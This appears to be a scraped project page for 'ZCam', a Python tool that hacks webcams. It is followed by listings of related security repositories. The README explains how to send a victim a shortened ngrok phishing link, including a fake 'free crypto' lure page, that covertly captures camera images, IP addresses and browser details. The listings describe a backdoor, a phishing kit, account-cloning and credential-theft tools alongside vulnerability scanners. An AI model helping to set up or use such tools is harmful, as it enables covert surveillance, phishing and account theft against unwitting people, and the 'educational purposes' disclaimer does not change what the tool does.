The First Python Compatible Camera Hacking Tool

Overview

ZCam

Hack webcam using python by sending malicious link.

logo

FEATURES :

  • [+] Real-time Camera hacking
  • [+] Python compatible
  • [+] URL Shortener using bitly [V 2.0]
  • [+] Less Size
  • [+] Updated regularly

TESTED ON :

  • Ubuntu
  • Kali Linux
  • Termux

INSTALLATION :

  • Install any Python 3.x version
  • Make sure you are using pip of Python3, to check pip --version
  • git clone https://github.com/sankethj/z-cam
  • pip install -r requirements.txt

HOW TO USE :

  • You need to signup in Bitly and get your access token in API session
  • Now in the project directory there is a file called tokensbitly.py, in that replace your_token with your access token
  • After running the script, it will ask if you want to shorten the ngrok link type y or else type n
  • you will be provided with ngrok tunnel link with or without shortened depending on what yoy have choosen
  • Send that link to Client
  • Cam Images will be stored in the directory called capture.
  • Captured Cam Image will be saved in the format of img_ .png
  • Clients' ip address, User-Agent (system, browser) details and it will be saved in the file called myfile.txt
  • Make sure you use Wifi or Hotspot turned ON while using this tool.

USAGE :

  • python3 zcam.py
  • First time while running the tool, you need to start and test yourself. Most of time due to some problem in flask it wont take images properly. After getting tunneling link quit the program and start it again. It will work fine definitely.

CONCEPT :

  • This tool is Python compatible
  • It uses Flask to host web-server
  • If you go through the code, there is both GET and POST requests made.
  • GET request will provide you the Clients' ip address, User-Agent details and it will be saved in the file called myfile.txt
  • POST request will provide you the Clients' Base64 encoded Cam image data and it will be decrypted and stored as image file in capture directory
  • I used pyngrok (the wrapper of ngrok), to create https tunnel and bitly to shorten the tunneled URL

SCREENSHOTS :

  • Replace with your bitly access token here

token

  • Working of zcam.py

tool1

  • Captured Cam image files

tool2

  • A Sample crypto webpage which attract more client for free crypto

webpage

  • Files stored

files

YOUTUBE :

YOUTUBE

CONTACT :

Telegram Twitter

REFERENCES :

  • Musa
  • Saycheese (thelinuxchoice)

WARNING :

This tool is only for educational purposes. If you use this tool for other purposes except educational we will not be responsible in such cases.

Owner
Sanketh J
@Team_ETF
Sanketh J
A secure password generator written in python

gruvbox-factory 🏭 "The main focus when developing gruvbox is to keep colors easily distinguishable, contrast enough and still pleasant for the eyes"

Paulo Pacitti 430 Dec 27, 2022
A Static Analysis Tool for Detecting Security Vulnerabilities in Python Web Applications

This project is no longer maintained March 2020 Update: Please go see the amazing Pysa tutorial that should get you up to speed finding security vulne

2.1k Dec 25, 2022
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

log4j-detect Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading The script

Víctor García 187 Jan 03, 2023
This tool allows to automatically test for Content Security Policy bypass payloads.

CSPass This tool allows to automatically test for Content Security Policy bypass payloads. Usage [cspass]$ ./cspass.py -h usage: cspass.py [-h] [--no-

Ruulian 30 Nov 22, 2022
Shell hunter for AF

AF-ShellHunter AF-ShellHunter: Auto shell lookup AF-ShellHunter its a script designed to automate the search of WebShell's in AF Team How to pip3 ins

Eduardo 34 May 13, 2022
It's a simple tool for test vulnerability Apache Path Traversal

SimplesApachePathTraversal Simples Apache Path Traversal It's a simple tool for test vulnerability Apache Path Traversal https://blog.mrcl0wn.com/2021

Mr. Cl0wn - H4ck1ng C0d3r 56 Dec 27, 2022
Malware-analysis-writeups - Some of my Malware Analysis writeups

About This repo contains some malware analysis writeups i've created over time m

Itay Migdal 14 Jun 22, 2022
A collection of over 5.1 million sub-domains and assets belonging to public bug bounty programs, compiled into a repo, for performing bulk operations.

📂 Public Bug Bounty Targets Data By BugBountyResources A collection of over 5.1M sub-domains and assets belonging to bug bounty targets, all put in a

Bug Bounty Resources 87 Dec 13, 2022
Lite version of my Gatekeeper backdoor for public use.

MayorSec Backdoor Fully functioning bind-type backdoor This backdoor is a fully functioning bind shell and lite version of my full functioning Gatekee

Joe Helle 56 Mar 25, 2022
Confluence Server Webwork OGNL injection

CVE-2021-26084 - Confluence Server Webwork OGNL injection An OGNL injection vulnerability exists that would allow an authenticated user and in some in

Fellipe Oliveira 295 Jan 06, 2023
Scanning for CVE-2021-44228

Filesystem log4j_scanner for windows and Unix. Scanning for CVE-2021-44228, CVE-2021-45046, CVE-2019-17571 Requires a minimum of Python 2.7. Can be ex

Brett England 4 Jan 09, 2022
🔎 Most Advanced Open Source Intelligence (OSINT) Framework for scanning IP Address, Emails, Websites, Organizations.

🔎 Most Advanced Open Source Intelligence (OSINT) Framework for scanning IP Address, Emails, Websites, Organizations.

BhavKaran 1.5k Dec 28, 2022
A python base script from which you can hack or clone any person's facebook friendlist or followers accounts which have simple password

Hcoder This is a python base script from which you can hack or clone any person's facebook friendlist or followers accounts which have simple password

Muhammad Hamza 3 Dec 06, 2021
Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT.

Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT. This repository includes tools and documentation for the Cryptick device.

1 Dec 31, 2021
WhPhisher: a Phishing tool With Python

WhPhisher Herramienta para hacer phishing con muchos métodos de túneling -----Como Instalarlo------- pkg install python3 pkg install git git clone htt

WhBeatZ 80 Jan 02, 2023
Python library to remotely extract credentials on a set of hosts.

Python library to remotely extract credentials on a set of hosts.

Pixis 1.5k Dec 31, 2022
Wordlist attacks on Bitwarden data.json files

BitwardenDecryptBrute This is a slightly modified version of BitwardenDecrypt. In addition to the decryption this version can do wordlist attacks for

42 Nov 09, 2022
A proxy server application written in python for trial purposes

python-proxy-server This is a proxy server ❤️ application written in python ❤️ for trial purposes. The purpose of the application; Connecting to Hacke

Ali Kasimoglu 2 Dec 27, 2021
A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye

MotionEye/MotionEyeOS Authenticated RCE A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye. You need administrator crede

Matt 1 Apr 18, 2022
A script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks

Log4j dork scanner This is an auto script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks. Installation:

Jagar 5 Dec 27, 2022